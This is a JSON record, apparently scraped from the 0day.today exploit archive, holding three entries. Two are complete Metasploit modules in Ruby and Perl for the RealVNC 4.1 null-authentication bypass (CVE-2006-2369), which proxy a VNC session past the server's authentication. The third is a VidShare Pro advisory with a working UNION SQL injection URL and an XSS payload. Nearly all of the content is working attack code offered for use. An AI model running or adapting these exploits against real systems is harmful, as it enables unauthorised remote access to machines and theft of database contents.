{"result": {"zdt": [{"lastseen": "2018-01-02T13:14:08", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 2, "reporter": "metasploit", "published": "2011-08-26T00:00:00", "title": "RealVNC Authentication Bypass", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-02T13:14:08", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-08-26T00:00:00", "id": "1337DAY-ID-16764", "href": "https://0day.today/exploit/description/16764", "sourceData": "##\r\n# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $\r\n##\r\n \r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n include Msf::Exploit::Remote::Tcp\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'RealVNC Authentication Bypass',\r\n 'Description' => %q{\r\n This module exploits an Authentication Bypass Vulnerability\r\n in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy\r\n listener on LPORT and proxies to the target server\r\n \r\n The AUTOVNC option requires that vncviewer be installed on\r\n the attacking machine. This option should be disabled for Pro\r\n },\r\n 'Author' =>\r\n [\r\n 'hdm', #original msf2 module\r\n 'TheLightCosine <thelightcosine[at]gmail.com>'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Version' => '$Revision: 13641 $',\r\n 'References' =>\r\n [\r\n ['BID', '17978'],\r\n ['OSVDB', '25479'],\r\n ['URL', 'http://secunia.com/advisories/20107/'],\r\n ['CVE', 'CVE-2006-2369'],\r\n ],\r\n 'DisclosureDate' => 'May 15 2006'))\r\n \r\n register_options(\r\n [\r\n OptAddress.new('RHOST', [true, 'The Target Host']),\r\n OptPort.new('RPORT', [true, \"The port the target VNC Server is listening on\", 5900 ]),\r\n OptPort.new('LPORT', [true, \"The port the local VNC Proxy should listen on\", 5900 ]),\r\n OptBool.new('AUTOVNC', [true, \"Automatically Launch vncviewer from this host\", true])\r\n ], self.class)\r\n end\r\n \r\n def run\r\n #starts up the Listener Server\r\n print_status(\"starting listener\")\r\n listener = Rex::Socket::TcpServer.create(\r\n 'LocalHost' => '0.0.0.0',\r\n 'LocalPort' => datastore['LPORT'],\r\n 'Context' => { 'Msf' => framework, 'MsfExploit' => self }\r\n )\r\n \r\n #If the autovnc option is set to true this will spawn a vncviewer on the lcoal machine\r\n #targetting the proxy listener.\r\n if (datastore['AUTOVNC'])\r\n unless (check_vncviewer())\r\n print_error(\"vncviewer does not appear to be installed, exiting!!!\")\r\n return nil\r\n end\r\n print_status(\"Spawning viewer thread\") \r\n view = framework.threads.spawn(\"VncViewerWrapper\", false) {\r\n system(\"vncviewer 127.0.0.1::#{datastore['LPORT']}\")\r\n }\r\n end\r\n \r\n #Establishes the connection between the viewier and the remote server\r\n client = listener.accept\r\n add_socket(client)\r\n \r\n s = Rex::Socket::Tcp.create(\r\n 'PeerHost' => datastore['RHOST'],\r\n 'PeerPort' => datastore['RPORT'],\r\n 'Timeout' => 1\r\n )\r\n add_socket(s)\r\n serverhello = s.gets\r\n unless serverhello.include? \"RFB 003.008\"\r\n print_error(\"The VNCServer is not vulnerable\")\r\n return\r\n end\r\n \r\n #MitM attack on the VNC Authentication Process\r\n client.puts(serverhello)\r\n clienthello = client.gets\r\n s.puts(clienthello)\r\n authmethods = s.recv(2)\r\n print_status(\"Auth Methods Recieved. Sending Null Authentication Option to Client\")\r\n client.write(\"\\x01\\x01\")\r\n client.recv(1)\r\n s.write(\"\\x01\")\r\n s.recv(4)\r\n client.write(\"\\x00\\x00\\x00\\x00\")\r\n \r\n #handles remaining proxy operations between the two sockets\r\n closed = false\r\n while(closed == false)\r\n sockets =[]\r\n sockets << client\r\n sockets << s\r\n selected = select(sockets,nil,nil,0)\r\n #print_status (\"Selected: #{selected.inspect}\")\r\n unless selected.nil?\r\n if selected[0].include?(client)\r\n #print_status(\"Transfering from client to server\")\r\n begin\r\n data = client.sysread(8192)\r\n if data.nil?\r\n print_error(\"Client Closed Connection\")\r\n closed = true\r\n else\r\n s.write(data)\r\n end\r\n rescue\r\n print_error(\"Client Closed Connection\")\r\n closed = true\r\n end\r\n end\r\n if selected[0].include?(s)\r\n #print_status(\"Transfering from server to client\")\r\n begin\r\n data = s.sysread(8192)\r\n if data.nil?\r\n print_error(\"Server Closed Connection\")\r\n closed = true\r\n else\r\n client.write(data)\r\n end\r\n rescue\r\n closed = true\r\n end\r\n end\r\n end\r\n end\r\n \r\n #Garbage Collection\r\n s.close\r\n client.close\r\n print_status(\"Listener Closed\")\r\n \r\n if (datastore['AUTOVNC'])\r\n view.kill\r\n print_status(\"Viewer Closed\")\r\n end\r\n end\r\n \r\n def check_vncviewer\r\n vnc =\r\n Rex::FileUtils::find_full_path('vncviewer') ||\r\n Rex::FileUtils::find_full_path('vncviewer.exe')\r\n if (vnc)\r\n return true\r\n else\r\n return false\r\n end\r\n end\r\nend\r\n\r\n\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16764"}, {"lastseen": "2018-03-14T02:39:05", "references": [], "description": "Exploit for unknown platform in category web applications", "edition": 2, "reporter": "Snakespc", "published": "2009-05-19T00:00:00", "title": "VidShare Pro (SQL/XSS) Multiple Remote Vulnerabilities", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-14T02:39:05", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-05-19T00:00:00", "id": "1337DAY-ID-5208", "href": "https://0day.today/exploit/description/5208", "sourceData": "======================================================\r\nVidShare Pro (SQL/XSS) Multiple Remote Vulnerabilities\r\n======================================================\r\n\r\n\r\n---------------------------------------------------------------------------\r\nVidShare Pro MULTIPLE REMOTE VULNERABILITIES\t\r\n---------------------------------------------------------------------------\r\nDiscovered By: Snakespc ALGERIAN HaCkEr \r\n---------------------------------------------------------------------------\r\n\r\nScript:VidShare Pro www.omnisoftsol.com\r\n\r\nDemo:http://www.omnisoftsol.com/index.php?option=com_content&task=view&id=7&Itemid=28\r\n\r\n(listing_video.php)\r\n----------------------------------------------------------------------------\r\nExploit:SQL\r\n--------\r\nDemo:\r\nhttp://demo.omnisoftsol.com/listing_video.php?catid=2+UNION%20SELECT%201,2,3,4,CHAR(83,%20110,%2097,%20107,%20101,%20115,%2084,%20101,%2097,%2077),6,7,8,9,10,11,concat(@@version,0x3a,user(),0x3a,database()),13,14,15,16,17,18--\r\n\r\n(XSS)<----Search form---->\r\n\r\n<script>alert(1954)</script>\r\n-----------------------------------------------------------------------------\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5208"}, {"lastseen": "2018-03-20T00:17:58", "references": [], "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "reporter": "H D Moore", "published": "2006-05-15T00:00:00", "title": "RealVNC 4.1.0 - 4.1.1 (Null Authentication) Auth Bypass Exploit (meta)", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-20T00:17:58", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-05-15T00:00:00", "id": "1337DAY-ID-8707", "href": "https://0day.today/exploit/description/8707", "sourceData": "======================================================================\r\nRealVNC 4.1.0 - 4.1.1 (Null Authentication) Auth Bypass Exploit (meta)\r\n======================================================================\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::realvnc_41_bypass;\r\n\r\nuse strict;\r\nuse base \"Msf::Exploit\";\r\nuse Pex::Text;\r\nuse IO::Socket::INET;\r\nuse POSIX;\r\n\r\nmy $advanced = {};\r\nmy $info =\r\n {\r\n\t'Name' => 'RealVNC 4.1 Authentication Bypass',\r\n\t'Version' => '$Revision: 1.1 $',\r\n\t'Authors' => [ 'H D Moore <hdm[at]metasploit.com>' ],\r\n\t'Description' =>\r\n\t Pex::Text::Freeform(qq{\r\n\t\tThis module exploits an authentication bypass flaw in version\r\n\t4.1.0 and 4.1.1 of the RealVNC service. This module acts as a proxy\r\n\tbetween a VNC client and a vulnerable server. Credit for this should\r\n\tgo to James Evans, who spent the time to figure this out after RealVNC\r\n\treleased a binary-only patch.\r\n}),\r\n\r\n\t'Arch' => [ ],\r\n\t'OS' => [ ],\r\n\t'Priv' => 0,\r\n\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'LPORT' => [ 1, 'PORT', 'The local VNC listener port', 5900 ],\r\n\t\t'LHOST' => [ 1, 'HOST', 'The local VNC listener host', \"0.0.0.0\" ],\r\n\t\t'RPORT' => [ 1, 'PORT', 'The remote VNC target port', 5900 ],\r\n\t\t'RHOST' => [ 1, 'HOST', 'The remote VNC target host'],\r\n\t\t'AUTOCONNECT' => [1, 'DATA', 'Automatically launch vncviewer', 1],\r\n\t },\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t['URL', 'http://secunia.com/advisories/20107/']\r\n\t ],\r\n\r\n\t'DefaultTarget' => 0,\r\n\t'Targets' =>\r\n\t [\r\n\t\t[ 'RealVNC' ],\r\n\t ],\r\n\r\n\t'Keys' => [ 'realvnc' ],\r\n\r\n\t'DisclosureDate' => 'May 15 2006',\r\n };\r\n\r\nsub new\r\n{\r\n\tmy $class = shift;\r\n\tmy $self;\r\n\r\n\t$self = $class->SUPER::new(\r\n\t\t{\r\n\t\t\t'Info' => $info,\r\n\t\t\t'Advanced' => $advanced,\r\n\t\t},\r\n\t\t@_);\r\n\r\n\treturn $self;\r\n}\r\n\r\nsub Exploit\r\n{\r\n\tmy $self = shift;\r\n\tmy $server = IO::Socket::INET->new(\r\n\t\tLocalHost => $self->GetVar('LHOST'),\r\n\t\tLocalPort => $self->GetVar('LPORT'),\r\n\t\tReuseAddr => 1,\r\n\t\tListen => 1,\r\n\t\tProto => 'tcp');\r\n\tmy $client;\r\n\r\n\t# Did the listener create fail?\r\n\tif (not defined($server))\r\n\t{\r\n\t\t$self->PrintLine(\"[-] Failed to create local VNC listener on \" . $self->GetVar('SSHDPORT'));\r\n\t\treturn;\r\n\t}\r\n\r\n\tif ($self->GetVar('AUTOCONNECT') =~ /^(T|Y|1)/i) {\r\n \tif (! fork()) {\r\n \tsystem(\"vncviewer 127.0.0.1::\".$self->GetVar('LPORT'));\r\n \texit(0);\r\n \t}\t\t\r\n\t}\r\n\r\n\t$self->PrintLine(\"[*] Waiting for VNC connections to \" . $self->GetVar('LHOST') . \":\" . $self->GetVar('LPORT') . \"...\");\r\n\r\n\twhile (defined($client = $server->accept()))\r\n\t{\r\n\t\t$self->HandleVNCClient(fd => Msf::Socket::Tcp->new_from_socket($client));\r\n\t}\r\n\r\n\treturn;\r\n}\r\n\r\n# Stolen from InjectVNCStage.pm\r\nsub HandleVNCClient\r\n{\r\n\tmy $self = shift;\r\n\tmy ($fd) = @{{@_}}{qw/fd/};\r\n\tmy $rhost;\r\n\tmy $rport;\r\n\r\n\t# Set the remote host information\r\n\t($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);\r\n\r\n\t# Create a connection to the target system\r\n\tmy $s = Msf::Socket::Tcp->new(\r\n\t\t'PeerAddr' => $self->GetVar('RHOST'),\r\n\t\t'PeerPort' => $self->GetVar('RPORT'),\r\n\t\t'SSL' => $self->GetVar('SSL')\r\n\t);\r\n\t\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Could not connect to the target VNC service: ' . $s->GetError);\r\n\t\t$fd->Close;\r\n\t\treturn;\r\n\t}\r\n\t\r\n\tmy $res = $s->Recv(-1, 5);\r\n\t\r\n\t# Hello from server\r\n\tif ($res !~ /^RFB 003\\.008/) {\r\n\t\t$self->PrintLine(\"[*] The remote VNC service is not vulnerable\");\r\n\t\t$fd->Close;\r\n\t\t$s->Close;\r\n\t\treturn;\r\n\t}\r\n\t# Send it to the client\r\n\t$fd->Send($res);\r\n\t\r\n\t# Hello from client\r\n\t$res = $fd->Recv(-1, 5);\r\n\tif ($res !~ /^RFB /) {\r\n\t\t$self->PrintLine(\"[*] The local VNC client appears to be broken\");\r\n\t\t$fd->Close;\r\n\t\t$s->Close;\r\n\t\treturn;\r\n\t}\r\n\t# Send it to the server\r\n\t$s->Send($res);\r\n\t\r\n\t# Read the authentication methods from the server\r\n\t$res = $s->Recv(-1, 5);\r\n\t\r\n\t# Tell the client that the server only supports NULL auth\r\n\t$fd->Send(\"\\x01\\x01\");\r\n\t\r\n\t# Start pumping data between the client and server\r\n\tif (! fork()) {\r\n\t\t$self->PrintLine(\"[*] Proxying data between the connections...\");\r\n\t\t$self->VNCProxy($s->Socket, $fd->Socket);\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\nsub VNCProxy {\r\n my $self = shift;\r\n my $srv = shift;\r\n my $cli = shift;\r\n\r\n foreach ($srv, $cli) {\r\n $_->blocking(1);\r\n $_->autoflush(1);\r\n }\r\n\r\n my $selector = IO::Select->new($srv, $cli);\r\n\r\n LOOPER:\r\n while(1) {\r\n my @ready = $selector->can_read;\r\n foreach my $ready (@ready) {\r\n if($ready == $cli) {\r\n my $data;\r\n $cli->recv($data, 8192);\r\n last LOOPER if (! length($data)); \r\n last LOOPER if(!$srv || !$srv->connected);\r\n eval { $srv->send($data); };\r\n last LOOPER if [email\u00a0protected];\r\n }\r\n elsif($ready == $srv) {\r\n my $data;\r\n $srv->recv($data, 8192);\r\n last LOOPER if(!length($data));\r\n last LOOPER if(!$cli || !$cli->connected);\r\n eval { $cli->send($data); };\r\n last LOOPER if [email\u00a0protected];\r\n }\r\n }\r\n }\r\n}\r\n\r\n\r\n1;\r\n\r\n\r\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8707"}]}}